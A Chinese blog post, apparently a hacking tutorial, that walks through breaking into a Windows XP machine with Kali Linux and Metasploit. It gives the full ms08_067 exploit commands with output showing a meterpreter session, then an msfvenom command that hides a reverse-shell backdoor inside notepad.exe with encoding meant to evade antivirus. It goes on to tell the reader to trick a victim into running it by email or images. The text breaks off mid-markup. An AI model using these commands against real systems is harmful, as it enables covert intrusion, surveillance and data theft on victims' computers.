服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2021-11-29 14:52:31

kali linux 入侵window实例

<p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">本文演示怎么使用Metasploit入侵windows xp sp3。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">启动msfconsole:</p><pre highlighted="true" style="margin: 10px auto; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; color: rgb(0, 0, 0); font-size: 12px;"><code class="hljs shell" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-meta" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">#</span><span class="bash" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"> msfconsole</span>
</code></pre><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;"><img src="https://static.luody.info/2017-04-25-14916413511904.png" alt="" style="border: 0px; max-width: 660px; height: auto; width: auto; max-height: 100%;"></p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">选择一个漏洞:</p><pre highlighted="true" style="margin: 10px auto; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; color: rgb(0, 0, 0); font-size: 12px;"><code class="hljs nginx" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-attribute" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">msf</span> &gt; search platform: windows xp sp3
</code></pre><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;"><img src="https://static.luody.info/2017-04-25-14916413691665.png" alt="" style="border: 0px; max-width: 660px; height: auto; width: auto; max-height: 100%;"></p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:</p><pre highlighted="true" style="margin: 10px auto; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; color: rgb(0, 0, 0); font-size: 12px;"><code class="hljs nginx" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-attribute" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">msf</span> &gt; <span class="hljs-literal" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">info</span> exploit/windows/smb/ms08_067_netapi
</code></pre><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;"><img src="https://static.luody.info/2017-04-25-14916413890358.png" alt="" style="border: 0px; max-width: 660px; height: auto; width: auto; max-height: 100%;"></p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">依次执行如下命令:</p><pre highlighted="true" style="margin: 10px auto; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; color: rgb(0, 0, 0); font-size: 12px;"><code class="hljs shell" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">msf &gt; use exploit/windows/smb/ms08_067_netapi
<span class="hljs-meta" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">&gt;</span><span class="bash" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"> <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> payload windows/meterpreter/bind_tcp</span>
<span class="hljs-meta" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">&gt;</span><span class="bash" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"> <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> RHOST 192.168.0.108(设置目标主机IP地址)</span>
<span class="hljs-meta" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">&gt;</span><span class="bash" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"> exploit</span>
</code></pre><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。</p><pre highlighted="true" style="margin: 10px auto; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; color: rgb(0, 0, 0); font-size: 12px;"><code class="hljs css" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-selector-attr" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">[*]</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Started</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">bind</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">handler</span>
<span class="hljs-selector-attr" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">[*]</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Automatically</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">detecting</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">the</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">target</span>...
<span class="hljs-selector-attr" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">[*]</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Fingerprint</span>: <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Windows</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">XP</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">SP3</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">-</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Service</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Pack</span> 3 <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">-</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">lang</span><span class="hljs-selector-pseudo" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">:Chinese</span>
<span class="hljs-selector-attr" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">[*]</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Selected</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Target</span>: <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Windows</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">XP</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">SP3</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Chinese</span> (<span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">AlwaysOn</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">NK</span>)
<span class="hljs-selector-attr" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">[*]</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Attempting</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">to</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">trigger</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">the</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">vulnerability</span>...
<span class="hljs-selector-attr" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">[*]</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Sending</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">stage</span> (751104 <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">bytes</span>) <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">to</span> 192<span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.168</span><span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.0</span><span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.108</span>
<span class="hljs-selector-attr" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">[*]</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Meterpreter</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">session</span> 1 <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">opened</span> (192<span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.168</span><span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.0</span><span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.1</span><span class="hljs-selector-pseudo" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">:41614</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">-</span>&gt; 192<span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.168</span><span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.0</span><span class="hljs-selector-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.108</span><span class="hljs-selector-pseudo" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">:4444)</span> <span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">at</span> 2016<span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">-04-15</span> 17<span class="hljs-selector-pseudo" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">:29</span><span class="hljs-selector-pseudo" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">:32</span>

<span class="hljs-selector-tag" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">meterpreter</span> &gt;
</code></pre><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。</p><h2 id="toc_0" style="margin-top: 10px; margin-bottom: 10px; font-size: 21px; color: rgb(3, 120, 187); line-height: 3em; font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif;">演示使用后门程序侵入Windows</h2><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">原理:在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">生成后门程序:</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">我把后门程序隐藏到记事本程序中:notepad.exe</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">查看Kali Linux的IP:ifconfig(192.168.0.112)</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">创建后门程序,my_backdoor.exe:</p><pre highlighted="true" style="margin: 10px auto; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; color: rgb(0, 0, 0); font-size: 12px;"><code class="hljs shell" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-meta" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">#</span><span class="bash" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe &gt; my_backdoor.exe</span>
</code></pre><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;"><img src="https://static.luody.info/2017-04-25-14916414413923.png" alt="" style="border: 0px; max-width: 660px; height: auto; width: auto; max-height: 100%;"></p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">上面命令使用加密试图躲过杀毒软件,但是,不要期望它可以生效。使用man msfvenom查看帮助。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">启动msfconsole:</p><pre highlighted="true" style="margin: 10px auto; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; color: rgb(0, 0, 0); font-size: 12px;"><code class="hljs shell" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-meta" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(43, 145, 175);">#</span><span class="bash" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"> msfconsole</span>
</code></pre><pre highlighted="true" style="margin: 10px auto; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; color: rgb(0, 0, 0); font-size: 12px;"><code class="hljs language-sql" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">use</span> exploit/multi/<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">handler</span>

<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> LHOST <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.0</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">.112</span>
<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> LPORT <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">4445</span>
<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> payload windows/meterpreter/reverse_tcp
<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">show</span> options
exploit
</code></pre><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">等待受害者启动后门程序。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;"><img src="https://static.luody.info/2017-04-25-14916414826564.png" alt="" style="border: 0px; max-width: 660px; height: auto; width: auto; max-height: 100%;"></p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">OK,入侵成功。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;"><img src="https://static.luody.info/2017-04-25-14916414933745.png" alt="" style="border: 0px; max-width: 660px; height: auto; width: auto; max-height: 100%;"></p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">Windows服务器系统包括一个全面、集成的基础结构,旨在满足开发人员和信息技术(IT)专业人员的要求。此系统设计用于运行特定的程序和解决方案,借助这些程序和解决方案,信息工作人员可以快速便捷地获取、分析和共享信息。入侵者对Windows服务器系统的攻击主要是针对IIS服务器和组网协议的攻击。</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">&nbsp;</p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 入侵Windows服务器的流程<br><img src="https://img2018.cnblogs.com/blog/1514572/201902/1514572-20190218123537814-1518564339.png" alt="" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p><p style="margin: 10px auto; text-align: justify; color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;">&nbsp;</p><div style="color: rgb(0, 0, 0); font-family: &quot;PingFang SC&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, &quot;Microsoft Yahei&quot;, sans-serif; font-size: 12px;"><div><h4 style="margin-top: 10px; margin-bottom: 10px; font-size: 14px; color: rgb(51, 51, 51);">实验环境</h4><div class="image-package"><div class="image-container"><div class="image-container-fill">&nbsp;</div><div class="image-view" data-width="809" data-height="388"><img src="https://upload-images.jianshu.io/upload_images/4976516-daae4fea5636c8d4.jpg" alt="" data-original-src="//upload-images.jianshu.io/upload_images/4976516-daae4fea5636c8d4.jpg" data-original-width="809" data-original-height="388" data-original-format="image/jpeg" data-original-filesize="26460" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></div></div><div class="image-caption">实验环境.jpg</div></div><h4 style="margin-top: 10px; margin-bottom: 10px; font-size: 14px; color: rgb(51, 51, 51);">试验工具</h4><p style="margin: 10px auto; text-align: justify;">kaili linux&nbsp;<a href="https://link.jianshu.com/?t=https://baike.baidu.com/item/Kali%20linux/8305689?fr=aladdin" rel="nofollow" target="_blank" style="color: rgb(0, 0, 0);">百度百科</a><br>其预装了许多试验工具,包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng. 用户可通过硬盘、live CD或live USB运行Kali Linux。<br><br><br>Metasploit&nbsp;<a href="https://link.jianshu.com/?t=https://baike.baidu.com/item/Metasploit/4926164?fr=aladdin" rel="nofollow" target="_blank" style="color: rgb(0, 0, 0);">百度百科</a><br>Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。<br></p><hr><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><h3 style="margin-top: 10px; margin-bottom: 10px; font-size: 16px; color: rgb(3, 120, 187); line-height: 2.5em;">知识点综述</h3><p style="margin: 10px auto; text-align: justify;">1.0 熟悉虚拟机vmware的相关知识,因为本环境是在VM中进行的,需要安装kaili linux和windows xp,以及设计虚拟机网络,其可以参考文章:<a href="https://www.jianshu.com/p/91c409b8ce79" target="_blank" style="color: rgb(0, 0, 0);">vmware14.0知识点手册</a>.<br>2.0 计算机网络相关知识点。<br><strong>2.1 vmware的虚拟网络</strong></p><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; 